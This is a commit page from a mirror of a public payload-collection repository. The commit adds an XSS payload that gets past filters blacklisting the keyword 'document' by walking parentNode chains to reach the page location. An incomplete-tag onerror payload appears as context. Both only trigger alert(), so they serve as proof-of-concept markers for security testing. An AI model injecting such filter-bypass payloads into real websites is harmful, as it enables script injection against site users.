1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-25 04:00:48 +02:00

XSS Payload - bypass document blacklisted keyword

This commit is contained in:
Swissky 2017-03-02 17:39:15 +01:00
parent 0a0abd8a9d
commit eecfc69c08

View File

@ -422,6 +422,10 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
<img src='1' onerror='alert(0)' <
```
Bypass document blacklist
```
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
```
Bypass using javascript inside a string
```